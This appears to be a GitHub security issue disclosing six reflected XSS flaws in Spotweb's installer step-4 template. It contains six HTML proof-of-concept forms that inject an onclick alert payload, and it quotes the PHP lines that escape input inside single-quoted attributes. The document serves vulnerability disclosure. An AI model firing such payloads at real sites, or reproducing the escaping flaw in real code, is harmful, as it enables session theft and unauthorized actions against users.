[Security] six XSS in templates/installer/step-004.inc.php

[seongil-wi]

Describe the bug/issue

• Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser.
• Note that these multiple XSS vulnerabilities exist in the spotweb.

Have you searched the internet or Github for an answer?

• Not related

To Reproduce
Steps to reproduce the behavior:

1. Go to the installation page
2. Complete the configuration including DB connection => goto step 4
3. Access each page of these HTML files.

Exploit 1 - exploit username parameter

<html>
<form method="POST" action="http://[localhost]/spotweb/install.php?page=4">
  <input name='settingsform[username]' value="1' onclick='alert(1)">
  <button>Send my greetings</button>
</form>
</html>

Exploit 2 - exploit newpassword1 parameter

<html>
<form method="POST" action="http://[localhost]/spotweb/install.php?page=4">
  <input name='settingsform[newpassword1]' value="1' onclick='alert(1)">
  <button>Send my greetings</button>
</form>
</html>

Exploit 3 - exploit newpassword2 parameter

<html>
<form method="POST" action="http://[localhost]/spotweb/install.php?page=4">
  <input name='settingsform[newpassword2]' value="1' onclick='alert(1)">
  <button>Send my greetings</button>
</form>
</html>

Exploit 4 - exploit firstname parameter

<html>
<form method="POST" action="http://[localhost]/spotweb/install.php?page=4">
  <input name='settingsform[firstname]' value="1' onclick='alert(1)">
  <button>Send my greetings</button>
</form>
</html>

Exploit 5 - exploit lastname parameter

<html>
<form method="POST" action="http://[localhost]/spotweb/install.php?page=4">
  <input name='settingsform[lastname]' value="1' onclick='alert(1)">
  <button>Send my greetings</button>
</form>
</html>

Exploit 6 - exploit mail parameter

<html>
<form method="POST" action="http://[localhost]/spotweb/install.php?page=4">
  <input name='settingsform[mail]' value="1' onclick='alert(1)">
  <button>Send my greetings</button>
</form>
</html>

4. Click each text field
5. Boom!

Expected behavior

• This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim.

Screenshots

Desktop (please complete the following information):

• (server) OS: ubuntu
• (client) OS: window
• Browser chrome
• Spotweb Version 1.5.1 and below versions
• Which branch Develop and Master
• PHP version 7.1

Additional context
The code below displays the user-controlled parameter username, newpassword1, newpassword2, firstname, lastname and mail with incorrect sanitization:

spotweb/templates/installer/step-004.inc.php

Line 41 in be2ab76

value='<?php echo htmlspecialchars($form['username']); ?>'/></td>

spotweb/templates/installer/step-004.inc.php

Line 46 in be2ab76

value='<?php echo htmlspecialchars($form['newpassword1']); ?>'/></td>

spotweb/templates/installer/step-004.inc.php

Line 51 in be2ab76

value='<?php echo htmlspecialchars($form['newpassword2']); ?>'/></td>

spotweb/templates/installer/step-004.inc.php

Line 56 in be2ab76

value='<?php echo htmlspecialchars($form['firstname']); ?>'/></td>

spotweb/templates/installer/step-004.inc.php

Line 61 in be2ab76

value='<?php echo htmlspecialchars($form['lastname']); ?>'/></td>

spotweb/templates/installer/step-004.inc.php

Line 66 in be2ab76

value='<?php echo htmlspecialchars($form['mail']); ?>'/></td>

[Sweepr]

It's the installer...

[seongil-wi]

Yes, you are right. However, remember that XSS vulnerabilities that occur during the installation process are also vulnerabilities.
For example, in CVE-2021-37389, CVE-2014-9571, CVE-2020-26043, CVE-2020-18670, etc., you can see the vendors acknowledging that there are vulnerabilities.